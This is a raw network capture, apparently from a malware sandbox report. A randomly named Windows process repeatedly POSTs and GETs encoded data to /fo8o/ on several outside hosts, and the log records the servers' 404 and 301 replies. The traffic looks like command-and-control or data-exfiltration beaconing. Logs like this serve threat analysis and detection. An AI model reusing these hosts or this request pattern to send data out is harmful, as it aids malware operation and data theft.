                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 37 57 6f 61 6b 78 51 2f 32 65 39 37 32 4a 59 4c 6b 39 35 71 4b 52 72 49 4f 79 4d 77 3d 3d
                                                                                      Data Ascii: LzY4r=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qx7WoakxQ/2e972JYLk95qKRrIOyMw==
                                                                                      Dec 6, 2024 17:46:24.732732058 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:24 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.949993195.110.124.133804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:26.113141060 CET1826OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 72 36 30 53 61 49 71 73 39 59 76 43 4b 61 34 34 35 6f 33 44 76 49 62 39 54 72 53 68 7a 2b 48 2b 33 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 75 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 [TRUNCATED]
                                                                                      Data Ascii: LzY4r=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKSf/r60SaIqs9YvCKa445o3DvIb9TrShz+H+33Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuuCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adY6OJWb476q0Q+bmb0hnKbf3THxmaenEfiuVQsu72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQcK9lYv/+N+PrZONYNpoKQ3sl0IXC/6zU+xq1fwgr8JNRREYVA3EdubrLvbVAmdhN31HB/ss4RWFPyLbsWJLUzEnXPe1lGGaAWFmFlU93uOS1kDu3bF4b2qDR6/B3Emt03agN9gQR47Gjngmx75oDUvuHJdMx3unliDVtUUuUx+T6ZwkQ83ttmL+LkzJB/gRXNcZCRbkYzd4sgtFhmt0zW8zVzt2k4nTaUmpijYjt9X7jQoTlV3MLEXOnroC6lSo2/Pk9bxAdDpyI2r9pwtLn0gP/gQMCXUrX/8fUAD0rc2PuXcYVXQWoUr8OiRYVlzSKzFUMRP/iM/KEOh23lyLwgNyNEVUwpkBu7eOTCESBnhlnkmxEj/lwX3ZCt2+MyRQYVaqS9ZRRbWGVxfe61Y/LPQWm4ZdZKNR4ANzg7yMXVo3Bo3qaOXY9ZGxPl3lVs+KREYNWe3Ad+KWBkN+MPqYmspTk0KzcuTJZvnfFQgRMQiDoxgPXZD2djHlKfng0LgcZGbFwMA1yLD58SEL [TRUNCATED]
                                                                                      Dec 6, 2024 17:46:27.414124966 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:27 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.949994195.110.124.133804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:28.801249981 CET513OUTGET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:46:30.078202963 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:29 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.949995217.196.55.202804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:52.352096081 CET777OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 76 39 30 2b 6a 75 71 78 72 4b 66 65 4a 78 78 35 45 69 47 4c 51 32 64 33 7a 48 6a 6f
                                                                                      Data Ascii: LzY4r=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jv90+juqxrKfeJxx5EiGLQ2d3zHjo
                                                                                      Dec 6, 2024 17:46:53.552764893 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Fri, 06 Dec 2024 16:46:53 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.949996217.196.55.202804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:55.010230064 CET801OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 64 51 30 67 71 41 64 71 62 39 2b 4b 48 66 33 44 58 43 6c 46 4f 33 44 75 31 54 4f 67 3d 3d
                                                                                      Data Ascii: LzY4r=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhdQ0gqAdqb9+KHf3DXClFO3Du1TOg==
                                                                                      Dec 6, 2024 17:46:56.209917068 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Fri, 06 Dec 2024 16:46:56 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.949997217.196.55.202804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:57.665819883 CET1814OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.empowermedeco.com
                                                                                      Origin: http://www.empowermedeco.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.empowermedeco.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 31 33 44 6c 54 76 7a 63 2f 49 66 64 6e 42 33 32 7a 57 54 57 4b 66 59 72 65 55 75 34 78 6b 73 63 72 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 56 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED]
                                                                                      Data Ascii: LzY4r=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWb3Nn13DlTvzc/IfdnB32zWTWKfYreUu4xkscrKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fV/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZwjLsRiXzLp0hW7XCxYtU4Yg0ZoSPICBxqpQZcANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu9hmqxppMzSSR7UA4dW16Bu2DKjbgT6L/DbRlNimMsB+P75MhcmW32kAWxFsSldlMU4Md+TC4NMlUjpW0fCWa6Mwjzo5tJP/M1s1aoCykvdpyc9w6HHFDY90zk4CKinoqhNy44lY9YeV+a1QgRhC7TNZ4+UT6gWg4ElKWajMWt4fapmEOWuUoijGRiATAadOxvdpDNhEfkG7wUSANZuZjofDpvNdpYNm91yAQsN38oC3wWnv0ry0w2VI2nIU13yNWffe2cuH1s0iooz1N5LaLtXlYO0opV/tgL3oosu/pAxCyl0CiHpMXlvDM7/5Rp97UJD3/edWJ+Zofwnn7DkaVH/Ao8jI+pYf5k1f5bbCRFINhXQuABSPo2xiHbf8T7XwPt5Zo7hklclqOhqVEz3v19j/P5JV1m4Qu5d+glEDjDrRrSUwOBUXhjeHGb3gUIqI3LfFqm6rbSi2cKLBIeUlmp3p8dBgY7iYLPO6r2JaK6eS0tN1KF733oTDKCD2h0HsmZGuVDyxZcLxrg9Lp [TRUNCATED]
                                                                                      Dec 6, 2024 17:46:58.878333092 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 795
                                                                                      date: Fri, 06 Dec 2024 16:46:58 GMT
                                                                                      server: LiteSpeed
                                                                                      location: https://www.empowermedeco.com/fo8o/
                                                                                      platform: hostinger
                                                                                      panel: hpanel
                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
